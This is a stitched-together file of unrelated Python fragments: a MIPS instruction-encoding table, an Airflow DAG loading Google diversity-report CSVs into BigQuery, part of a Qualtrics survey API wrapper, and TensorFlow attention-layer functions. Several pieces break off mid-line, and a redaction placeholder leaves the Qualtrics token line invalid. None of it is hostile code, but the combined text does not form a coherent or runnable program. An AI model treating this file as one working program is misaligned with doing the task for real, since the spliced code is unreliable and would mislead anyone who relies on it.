self.fit('CACHE', [[OPCODE, 47], BASE, OP, IMMEDIATE], [OP, IMMEDIATE, BASE])
self.fit('DMFC0', [[OPCODE, 16], [EX_OPCODE, 1], RD, CS, 5, [OPCODE, 0]], [RD, CS])
self.fit('DMTC0', [[OPCODE, 16], [EX_OPCODE, 5], RT, CS, 5, [OPCODE, 0]], [RT, CS])
self.fit('ERET', [[OPCODE, 16], CO, 19, [OPCODE, 24]], [])
self.fit('MFC0', [[OPCODE, 16], [EX_OPCODE, 0], RD, CS, 5, [OPCODE, 0]], [RD, CS])
self.fit('MTC0', [[OPCODE, 16], [EX_OPCODE, 4], RT, CS, 5, [OPCODE, 0]], [RT, CS])
self.fit('TLBP', [[OPCODE, 16], CO, 19, [OPCODE, 8]], [])
self.fit('TLBR', [[OPCODE, 16], CO, 19, [OPCODE, 1]], [])
self.fit('TLBWI', [[OPCODE, 16], CO, 19, [OPCODE, 2]], [])
self.fit('TLBWR', [[OPCODE, 16], CO, 19, [OPCODE, 6]], [])
# Floating-point Unit (COP1) Instructions
# These, instead of having OPCODE as the final segment, should be [ES, 3], [COND, (0 to 15 for each code)]
# But changing it to what I have optimises it slightly
self.fit('C.F.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 48]], [FS, FT])
self.fit('C.UN.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 49]], [FS, FT])
self.fit('C.EQ.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 50]], [FS, FT])
self.fit('C.UEQ.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 51]], [FS, FT])
self.fit('C.OLT.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 52]], [FS, FT])
self.fit('C.ULT.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 53]], [FS, FT])
self.fit('C.OLE.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 54]], [FS, FT])
self.fit('C.ULE.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 55]], [FS, FT])
self.fit('C.SF.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 56]], [FS, FT])
self.fit('C.NGLE.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 57]], [FS, FT])
self.fit('C.SEQ.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 58]], [FS, FT])
self.fit('C.NGL.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 59]], [FS, FT])
self.fit('C.LT.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 60]], [FS, FT])
self.fit('C.NGE.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 61]], [FS, FT])
self.fit('C.LE.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 62]], [FS, FT])
self.fit('C.NGT.S', [[OPCODE, 17], [FMT, 16], FT, FS, 5, [OPCODE, 63]], [FS, FT])
self.fit('C.F.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 48]], [FS, FT])
self.fit('C.UN.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 49]], [FS, FT])
self.fit('C.EQ.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 50]], [FS, FT])
self.fit('C.UEQ.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 51]], [FS, FT])
self.fit('C.OLT.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 52]], [FS, FT])
self.fit('C.ULT.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 53]], [FS, FT])
self.fit('C.OLE.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 54]], [FS, FT])
self.fit('C.ULE.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 55]], [FS, FT])
self.fit('C.SF.D', [[OPCODE, 17], [FMT, 17], FT, FS, 5, [OPCODE, 56]], [FS, | |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow import DAG
from airflow.providers.google.cloud.transfers import gcs_to_bigquery
# Common arguments applied to every task of the DAG defined below.
default_args = dict(
    owner="Google",
    depends_on_past=False,
    start_date="2021-05-01",
)
with DAG(
dag_id="google_dei.diversity_annual_report",
default_args=default_args,
max_active_runs=1,
schedule_interval="@once",
catchup=False,
default_view="graph",
) as dag:
# Task to load CSV data to a BigQuery table
load_intersectional_attrition_index_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_intersectional_attrition_index_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/intersectional_attrition_index.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_intersectional_attrition_index",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "gender_us",
"description": "Gender of Googler exits in the U.S.",
"type": "string",
"mode": "required",
},
{
"name": "race_asian",
"description": "The attrition index score of Googlers in the U.S. who identify as Asian and zero or more other races",
"type": "integer",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The attrition index score of Googlers in the U.S. who identify as Black and zero or more other races",
"type": "integer",
"mode": "nullable",
},
{
"name": "race_hispanic_latinx",
"description": "The attrition index score of Googlers in the U.S. who identify as Hispanic or Latinx and zero or more other races",
"type": "integer",
"mode": "nullable",
},
{
"name": "race_native_american",
"description": "The attrition index score of Googlers in the U.S. who identify as Native American and zero or more other races",
"type": "integer",
"mode": "nullable",
},
{
"name": "race_white",
"description": "The attrition index score of Googlers in the U.S. who identify as White and zero or more other races",
"type": "integer",
"mode": "nullable",
},
],
)
# Task to load CSV data to a BigQuery table
load_intersectional_hiring_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_intersectional_hiring_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/intersectional_hiring.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_intersectional_hiring",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "gender_us",
"description": "Gender of Googlers hired in the U.S.",
"type": "string",
"mode": "required",
},
{
"name": "race_asian",
"description": "The percentage of Googlers hired in the U.S. who identify as Asian and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The percentage of Googlers hired in the U.S. who identify as Black and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_hispanic_latinx",
"description": "The percentage of Googlers hired in the U.S. who identify as Hispanic or Latinx and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_native_american",
"description": "The percentage of Googlers hired in the U.S. who identify as Native American and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_white",
"description": "The percentage of Googlers hired in the U.S. who identify as White and zero or more other races",
"type": "float",
"mode": "nullable",
},
],
)
# Task to load CSV data to a BigQuery table
load_intersectional_representation_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_intersectional_representation_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/intersectional_representation.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_intersectional_representation",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "gender_us",
"description": "Gender of Googlers in the U.S.",
"type": "string",
"mode": "required",
},
{
"name": "race_asian",
"description": "The percentage of Googlers in the U.S. who identify as Asian and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The percentage of Googlers in the U.S. who identify as Black and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_hispanic_latinx",
"description": "The percentage of Googlers in the U.S. who identify as Hispanic or Latinx and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_native_american",
"description": "The percentage of Googlers in the U.S. who identify as Native American and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_white",
"description": "The percentage of Googlers in the U.S. who identify as White and zero or more other races",
"type": "float",
"mode": "nullable",
},
],
)
# Task to load CSV data to a BigQuery table
load_intersectional_exits_representation_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_intersectional_exits_representation_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/intersectional_exits_representation.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_intersectional_exits_representation",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "gender_us",
"description": "Gender of Googler exits in the U.S.",
"type": "string",
"mode": "required",
},
{
"name": "race_asian",
"description": "The percentage of Googler exits in the U.S. who identify as Asian and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The percentage of Googler exits in the U.S. who identify as Black and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_hispanic_latinx",
"description": "The percentage of Googler exits in the U.S. who identify as Hispanic or Latinx and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_native_american",
"description": "The percentage of Googler exits in the U.S. who identify as Native American and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_white",
"description": "The percentage of Googler exits in the U.S. who identify as White and zero or more other races",
"type": "float",
"mode": "nullable",
},
],
)
# Task to load CSV data to a BigQuery table
load_non_intersectional_representation_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_non_intersectional_representation_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/non_intersectional_representation.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_non_intersectional_representation",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "race_asian",
"description": "The percentage of Googlers in the U.S. who identify as Asian and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The percentage of Googlers in the U.S. who identify as Black and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_hispanic_latinx",
"description": "The percentage of Googlers in the U.S. who identify as Hispanic or Latinx and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_native_american",
"description": "The percentage of Googlers in the U.S. who identify as Native American and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_white",
"description": "The percentage of Googlers in the U.S. who identify as White and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "gender_us_women",
"description": "The percentage of Googlers in the U.S. who identify as women",
"type": "float",
"mode": "nullable",
},
{
"name": "gender_us_men",
"description": "The percentage of Googlers in the U.S. who identify as men",
"type": "float",
"mode": "nullable",
},
{
"name": "gender_global_women",
"description": "The percentage of global Googlers who identify as women",
"type": "float",
"mode": "nullable",
},
{
"name": "gender_global_men",
"description": "The percentage of global Googlers who identify as men",
"type": "float",
"mode": "nullable",
},
],
)
# Task to load CSV data to a BigQuery table
load_non_intersectional_exits_representation_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_non_intersectional_exits_representation_to_bq",
bucket="{{ var.json.google_dei.storage_bucket }}",
source_objects=["DAR/2022/non_intersectional_exits_representation.csv"],
source_format="CSV",
destination_project_dataset_table="google_dei.dar_non_intersectional_exits_representation",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{
"name": "workforce",
"description": "Overall and sub-categories",
"type": "string",
"mode": "required",
},
{
"name": "report_year",
"description": "The year the report was published",
"type": "integer",
"mode": "required",
},
{
"name": "race_asian",
"description": "The percentage of Googler exits in the U.S. who identify as Asian and zero or more other races",
"type": "float",
"mode": "nullable",
},
{
"name": "race_black",
"description": "The percentage of Googler exits in the U.S. who | |
complete to the local file system
https://api.qualtrics.com/docs/get-response-export-file
:param responseExportId: The ID given to you after running your Response Export call or URL return by GetResponseExportProgress
:type responseExportId: str
:param filename: where to save zip file returned by Qualtrics
:type filename: str
:return: True is success, None if error
"""
if "https://" in responseExportId:
url = responseExportId
else:
url = "https://survey.qualtrics.com/API/v3/responseexports/%s/file" % responseExportId
response = self.request3(url, method="get", stream=True)
if response is None:
return None
self.last_error_message = None
with open(filename, "wb") as fp:
for chunk in response.iter_content(8192):
fp.write(chunk)
return True
def request(self, Request, Product='RS', post_data=None, post_files=None, **kwargs):
""" Send GET or POST request to Qualtrics API using v2.x format
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#overview_2.5
This function also sets self.last_error_message and self.json_response
:param Request: The name of the API call to be made ("createPanel", "deletePanel" etc).
:param post_data: Content of POST request. If None, GET request will be sent
:param post_files: Files to post (for importSurvey API call)
:param kwargs: Additional parameters for this API Call (LibraryID="abd", PanelID="123")
:return: None if request failed
"""
Version = kwargs.pop("Version", self.default_api_version)
# Version must be a string, not an integer or float
assert Version, STR
# Handling for Multi Product API calls
if self.url:
# Force URL, for use in unittests.
url = self.url
elif Product == 'RS':
url = "https://survey.qualtrics.com/WRAPI/ControlPanel/api.php"
elif Product == 'TA':
url = "https://survey.qualtrics.com/WRAPI/Contacts/api.php"
else:
raise NotImplementedError('Please specify a valid product api')
# Special case for handling embedded data
ed = kwargs.pop("ED", None)
# http://stackoverflow.com/questions/38987/how-can-i-merge-two-python-dictionaries-in-a-single-expression
params = {"User": self.user,
"Token": <PASSWORD>.token,
"Format": "JSON",
"Version": Version,
"Request": Request,
}
# Python 2 and 3 compatible dictionary merge
for item in kwargs:
params[item] = kwargs[item]
# Format embedded data properly,
# Example: ED[SubjectID]=CLE10235&ED[Zip]=74534
if ed is not None:
for key in ed:
params["ED[%s]" % key] = ed[key]
self.json_response = None
self.last_error_message = "Not yet set by request function"
self.last_status_code = None
try:
if post_data:
r = requests.post(url,
data=post_data,
params=params,
**self.requests_kwargs)
elif post_files:
r = requests.post(url,
files=post_files,
params=params,
**self.requests_kwargs)
else:
r = requests.get(
url,
params=params,
**self.requests_kwargs
)
except (ConnectionError, Timeout, TooManyRedirects, HTTPError) as e:
# http://docs.python-requests.org/en/master/user/quickstart/#errors-and-exceptions
# ConnectionError: In the event of a network problem (e.g. DNS failure, refused connection, etc) Requests will raise a ConnectionError exception.
# HTTPError: Response.raise_for_status() will raise an HTTPError if the HTTP request returned an unsuccessful status code.
# Timeout: If a request times out, a Timeout exception is raised.
# TooManyRedirects: If a request exceeds the configured number of maximum redirections, a TooManyRedirects exception is raised.
self.last_url = ""
self.response = None
self.last_error_message = str(e)
return None
self.last_url = r.url
self.response = r.text
self.last_status_code = r.status_code
if r.status_code == 403:
self.last_error_message = "API Error: HTTP Code %s (Forbidden)" % r.status_code
return None
if r.status_code == 401 and Request == "getSurvey":
# I'm don't know if 401 is returned for requests other than getSurvey
self.last_error_message = "API Error: HTTP Code %s (Unauthorized)" % r.status_code
return None
# Apparently, getSurvey now returns error 500 and error message in XML format:
# <XML>
# <Meta>
# <Status>Error</Status>
# <RequestType>getSurvey</RequestType>
# <ErrorCode>500</ErrorCode>
# <QualtricsErrorCode>ESRV18</QualtricsErrorCode>
# <ErrorMessage>This survey is Unknown to this user account.</ErrorMessage>
# <Debug></Debug>
# </Meta>
# <Result></Result>
# </XML>
if r.status_code == 500 and Request == "getSurvey":
root = ET.fromstring(r.text)
try:
self.last_error_message = root.find("Meta").find("ErrorMessage").text
except AttributeError:
# 'NoneType' object has no attribute 'text'
self.last_error_message = "Internal server error"
return None
try:
if Request == "getLegacyResponseData":
# Preserve order of responses and fields in each response using OrderedDict
json_response = json.loads(r.text, object_pairs_hook=collections.OrderedDict)
else:
# Don't not use OrderedDict for simplicity.
json_response = json.loads(r.text)
except ValueError:
# If the data being deserialized is not a valid JSON document, a ValueError will be raised.
self.json_response = None
if "Format" not in kwargs:
self.last_error_message = "Unexpected response from Qualtrics: not a JSON document"
return None
else:
# Special case - getSurvey. That request has a custom response format (xml).
# It does not follow the default response format
self.last_error_message = None
return r.text
self.json_response = json_response
# Sanity check.
if (Request == "getLegacyResponseData" or Request == "getPanel" or Request ==
"getListContacts") and "Meta" not in json_response:
# Special cases - getLegacyResponseData, getPanel and getListContacts
# Success
self.last_error_message = None
return json_response
if "Meta" not in json_response:
# Should never happen
self.last_error_message = "Unexpected response from Qualtrics: no Meta key in JSON response"
return None
if "Status" not in json_response["Meta"]:
# Should never happen
self.last_error_message = "Unexpected response from Qualtrics: no Status key in JSON response"
return None
if json_response["Meta"]["Status"] == "Success":
self.last_error_message = None
return json_response
# If error happens, it returns JSON object too
# Error message is in json_response["Meta"]["ErrorMessage"]
self.last_error_message = json_response["Meta"]["ErrorMessage"]
return None
def createPanel(self, LibraryID, Name, **kwargs):
    """Create a new Panel in the Qualtrics system.

    https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#createPanel_2.5

    :param LibraryID: The library id you want to create the panel in
    :param Name: The name of the new panel
    :return: PanelID of the new panel, or None if an error occurs
    """
    # request() returns None on failure and stores the parsed JSON in
    # self.json_response on success.
    response = self.request("createPanel", LibraryID=LibraryID, Name=Name, **kwargs)
    if response is None:
        return None
    return self.json_response["Result"]["PanelID"]
def deletePanel(self, LibraryID, PanelID, **kwargs):
    """Delete the panel.

    https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#deletePanel_2.5

    :param LibraryID: The library id the panel is in.
    :param PanelID: The panel id that will be deleted.
    :return: True if deletion was successful, False otherwise
    """
    # request() yields None on failure; anything else counts as success.
    return self.request("deletePanel", LibraryID=LibraryID,
                        PanelID=PanelID, **kwargs) is not None
def getPanelMemberCount(self, LibraryID, PanelID, **kwargs):
    """Get the number of panel members.

    https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#getPanelMemberCount_2.5

    :param LibraryID: The library ID where this panel belongs
    :param PanelID: The panel ID
    :param kwargs: Additional parameters (used by unittest)
    :return: The number of members, or None if an error occurs
    """
    response = self.request("getPanelMemberCount", LibraryID=LibraryID,
                            PanelID=PanelID, **kwargs)
    if response is None:
        return None
    # Coerce to int: the count may arrive as a JSON string.
    return int(self.json_response["Result"]["Count"])
def addRecipient(self, LibraryID, PanelID, FirstName, LastName, Email, ExternalDataRef, Language, ED, **kwargs):
    """Add a new recipient to a panel.

    https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#addRecipient_2.5

    :param LibraryID: The library the recipient belongs to
    :param PanelID: The panel to add the recipient
    :param FirstName: The first name
    :param LastName: The last name
    :param Email: The email address
    :param ExternalDataRef: The external data reference
    :param Language: The language code
    :param ED: The embedded data (dictionary)
    :param kwargs: Additional optional API parameters, forwarded verbatim
        (added for consistency with the other wrapper methods; backward
        compatible since existing callers pass no extra arguments)
    :return: The Recipient ID, or None if an error occurs
    """
    if not self.request("addRecipient",
                        LibraryID=LibraryID,
                        PanelID=PanelID,
                        FirstName=FirstName,
                        LastName=LastName,
                        Email=Email,
                        ExternalDataRef=ExternalDataRef,
                        Language=Language,
                        ED=ED,
                        **kwargs):
        return None
    return self.json_response["Result"]["RecipientID"]
def getRecipient(self, LibraryID, RecipientID, **kwargs):
    """Get a representation of the recipient and their history.

    https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#getRecipient_2.5

    :param LibraryID: The library the recipient belongs to
    :param RecipientID: The recipient id of the person's response history you want to retrieve
    :param kwargs: Additional optional API parameters, forwarded verbatim
        (added for consistency with the other wrapper methods; backward
        compatible since existing callers pass no extra arguments)
    :return: The recipient representation, or None if an error occurs
    """
    if not self.request("getRecipient", LibraryID=LibraryID,
                        RecipientID=RecipientID, **kwargs):
        return None
    return self.json_response["Result"]["Recipient"]
def removeRecipient(self, LibraryID, PanelID, RecipientID, **kwargs):
    """Remove the specified panel member recipient from the specified panel.

    https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#removeRecipient_2.5

    :param LibraryID: The library the recipient belongs to
    :param PanelID: The panel to remove the recipient from
    :param RecipientID: The recipient id of the person that will be updated
    :return: True if successful, False otherwise
    """
    # Any falsy response (None) from request() means the call failed.
    response = self.request("removeRecipient", LibraryID=LibraryID,
                            PanelID=PanelID, RecipientID=RecipientID, **kwargs)
    return bool(response)
def sendSurveyToIndividual(self, **kwargs):
    """Send a survey through the Qualtrics mailer to the individual specified.

    The request is queued on the Qualtrics side: emails are not sent
    immediately, although they are usually delivered a few seconds after
    this call completes.
    https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#sendSurveyToIndividual_2.5

    Example response (success):
    {u'Meta': {u'Status': u'Success', u'Debug': u''},
     u'Result': {u'DistributionQueueID': u'EMD_e3F0KAIVfzIYw0R', u'EmailDistributionID': u'EMD_e3F0KAIVfzIYw0R', u'Success': True}}

    :param kwargs: Request parameters (SurveyID, recipient data, ...)
    :return: EmailDistributionID, or None if an error occurs
    """
    if self.request("sendSurveyToIndividual", **kwargs):
        return self.json_response["Result"]["EmailDistributionID"]
    return None
def sendSurveyToPanel(self, SurveyID, SendDate, SentFromAddress, FromEmail, FromName, Subject, MessageID, MessageLibraryID, PanelID, PanelLibraryID, LinkType, **kwargs):
""" Sends a survey through the Qualtrics mailer to the panel specified.
Note that request will be put to queue and emails are not sent immediately (although they usually
delivered in a few seconds after this function is complete)
https://survey.qualtrics.com/WRAPI/ControlPanel/docs.php#sendSurveyToPanel_2.5
Example response (success):
{"Meta":{"Status":"Success","Debug":""},
"Result":{"Success":true,"EmailDistributionID":"EMD_0DQNoLbdDMeGvK5", "DistributionQueueID":"EMD_0DQNoLbdDMeGvK5"}}
:param LinkType: The type of link that will be sent out.
Individual (default) - one unique link for each recipient will be generated that can be taken one | |
shape [batch, seq_length, hidden_size].
num_attention_heads: Number of attention heads.
head_size: The size per attention head.
initializer: Kernel initializer.
activation: Actication function.
name: The name scope of this layer.
Returns:
float logits Tensor.
"""
input_shape = get_shape_list(input_tensor)
hidden_size = input_shape[2]
with tf.variable_scope(name):
w = tf.get_variable(
name="kernel",
shape=[hidden_size, num_attention_heads * head_size],
initializer=initializer)
w = tf.reshape(w, [hidden_size, num_attention_heads, head_size])
b = tf.get_variable(
name="bias",
shape=[num_attention_heads * head_size],
initializer=tf.zeros_initializer)
b = tf.reshape(b, [num_attention_heads, head_size])
ret = tf.einsum("BFH,HND->BFND", input_tensor, w)
ret += b
if activation is not None:
return activation(ret)
else:
return ret
def dense_layer_3d_proj(input_tensor,
                        hidden_size,
                        head_size,
                        initializer,
                        activation,
                        name=None):
  """A dense layer with 3D kernel for projection.

  Projects a per-head tensor [batch, seq, num_heads, head_size] back down to
  [batch, seq, hidden_size]; the inverse of dense_layer_3d.

  Args:
    input_tensor: float Tensor of shape [batch, from_seq_length,
      num_attention_heads, size_per_head].
    hidden_size: The size of the output hidden dimension.
    head_size: The size per attention head.
    initializer: Kernel initializer.
    activation: Activation function; None gives a linear projection.
    name: The name scope of this layer.

  Returns:
    float Tensor of shape [batch, from_seq_length, hidden_size].
  """
  input_shape = get_shape_list(input_tensor)
  # The head count is read from the input shape rather than passed in.
  num_attention_heads = input_shape[2]
  with tf.variable_scope(name):
    # The kernel is stored 2-D (checkpoint compatible) and reshaped to 3-D
    # for the einsum contraction over the (head, depth) axes.
    w = tf.get_variable(
        name="kernel",
        shape=[num_attention_heads * head_size, hidden_size],
        initializer=initializer)
    w = tf.reshape(w, [num_attention_heads, head_size, hidden_size])
    b = tf.get_variable(
        name="bias", shape=[hidden_size], initializer=tf.zeros_initializer)
    # B=batch, F=from_seq, N=heads, D=head size, H=hidden.
    ret = tf.einsum("BFND,NDH->BFH", input_tensor, w)
    ret += b
    if activation is not None:
      return activation(ret)
    else:
      return ret
def dense_layer_2d(input_tensor,
                   output_size,
                   initializer,
                   activation,
                   num_attention_heads=1,
                   name=None):
  """A dense layer with 2D kernel.

  Args:
    input_tensor: Float tensor with rank 3.
    output_size: The size of output dimension.
    initializer: Kernel initializer.
    activation: Activation function.
    num_attention_heads: number of attention head in attention layer.
    name: The name scope of this layer.

  Returns:
    float logits Tensor.
  """
  # The head count is accepted only for signature parity with the 3-D layers.
  del num_attention_heads  # unused
  hidden_size = get_shape_list(input_tensor)[2]
  with tf.variable_scope(name):
    kernel = tf.get_variable(
        name="kernel",
        shape=[hidden_size, output_size],
        initializer=initializer)
    bias = tf.get_variable(
        name="bias", shape=[output_size], initializer=tf.zeros_initializer)
    # B=batch, F=seq, H=hidden, O=output.
    output = tf.einsum("BFH,HO->BFO", input_tensor, kernel) + bias
    return output if activation is None else activation(output)
def dot_product_attention(q, k, v, bias, dropout_rate=0.0):
  """Dot-product attention.

  Args:
    q: Tensor with shape [..., length_q, depth_k].
    k: Tensor with shape [..., length_kv, depth_k]. Leading dimensions must
      match with q.
    v: Tensor with shape [..., length_kv, depth_v] Leading dimensions must
      match with q.
    bias: bias Tensor (see attention_bias()), or None for no masking.
    dropout_rate: a float.

  Returns:
    Tensor with shape [..., length_q, depth_v].
  """
  logits = tf.matmul(q, k, transpose_b=True)  # [..., length_q, length_kv]
  # Scale by 1/sqrt(depth_k) to keep the softmax inputs in a stable range.
  logits = tf.multiply(logits, 1.0 / math.sqrt(float(get_shape_list(q)[-1])))
  if bias is not None:
    # `attention_mask` = [B, T]
    from_shape = get_shape_list(q)
    if len(from_shape) == 4:
      broadcast_ones = tf.ones([from_shape[0], 1, from_shape[2], 1], tf.float32)
    elif len(from_shape) == 5:
      # from_shape = [B, N, Block_num, block_size, depth]#
      broadcast_ones = tf.ones([from_shape[0], 1, from_shape[2], from_shape[3],
                                1], tf.float32)
    # NOTE(review): a q of any other rank leaves `broadcast_ones` unbound
    # (NameError). Callers in this file always pass rank-4 q.
    bias = tf.matmul(broadcast_ones,
                     tf.cast(bias, tf.float32), transpose_b=True)

    # Since attention_mask is 1.0 for positions we want to attend and 0.0 for
    # masked positions, this operation will create a tensor which is 0.0 for
    # positions we want to attend and -10000.0 for masked positions.
    adder = (1.0 - bias) * -10000.0

    # Since we are adding it to the raw scores before the softmax, this is
    # effectively the same as removing these entirely.
    logits += adder
  # (The former `else: adder = 0.0` branch was dead code: `adder` is never
  # read when bias is None, so it has been removed.)
  attention_probs = tf.nn.softmax(logits, name="attention_probs")
  attention_probs = dropout(attention_probs, dropout_rate)
  return tf.matmul(attention_probs, v)
def attention_layer(from_tensor,
                    to_tensor,
                    attention_mask=None,
                    num_attention_heads=1,
                    query_act=None,
                    key_act=None,
                    value_act=None,
                    attention_probs_dropout_prob=0.0,
                    initializer_range=0.02,
                    batch_size=None,
                    from_seq_length=None,
                    to_seq_length=None):
  """Performs multi-headed attention from `from_tensor` to `to_tensor`.

  Args:
    from_tensor: float Tensor of shape [batch_size, from_seq_length,
      from_width].
    to_tensor: float Tensor of shape [batch_size, to_seq_length, to_width].
    attention_mask: (optional) int32 Tensor of shape [batch_size,
      from_seq_length, to_seq_length]. The values should be 1 or 0. The
      attention scores will effectively be set to -infinity for any positions in
      the mask that are 0, and will be unchanged for positions that are 1.
    num_attention_heads: int. Number of attention heads.
    query_act: (optional) Activation function for the query transform.
    key_act: (optional) Activation function for the key transform.
    value_act: (optional) Activation function for the value transform.
    attention_probs_dropout_prob: (optional) float. Dropout probability of the
      attention probabilities.
    initializer_range: float. Range of the weight initializer.
    batch_size: (Optional) int. If the input is 2D, this might be the batch size
      of the 3D version of the `from_tensor` and `to_tensor`.
    from_seq_length: (Optional) If the input is 2D, this might be the seq length
      of the 3D version of the `from_tensor`.
    to_seq_length: (Optional) If the input is 2D, this might be the seq length
      of the 3D version of the `to_tensor`.

  Returns:
    float Tensor of shape [batch_size, from_seq_length, num_attention_heads,
      size_per_head].

  Raises:
    ValueError: Any of the arguments or tensor shapes are invalid.
  """
  from_shape = get_shape_list(from_tensor, expected_rank=[2, 3])
  to_shape = get_shape_list(to_tensor, expected_rank=[2, 3])
  # Each head gets an equal slice of the hidden width; assumes from_width is
  # divisible by num_attention_heads.
  # NOTE(review): rank-2 inputs would fail here (from_shape[2] out of range)
  # despite expected_rank allowing 2 — in practice callers pass rank 3.
  size_per_head = int(from_shape[2] / num_attention_heads)

  if len(from_shape) != len(to_shape):
    raise ValueError(
        "The rank of `from_tensor` must match the rank of `to_tensor`.")

  if len(from_shape) == 3:
    batch_size = from_shape[0]
    from_seq_length = from_shape[1]
    to_seq_length = to_shape[1]
  elif len(from_shape) == 2:
    if (batch_size is None or from_seq_length is None or to_seq_length is None):
      raise ValueError(
          "When passing in rank 2 tensors to attention_layer, the values "
          "for `batch_size`, `from_seq_length`, and `to_seq_length` "
          "must all be specified.")

  # Scalar dimensions referenced here:
  #   B = batch size (number of sequences)
  #   F = `from_tensor` sequence length
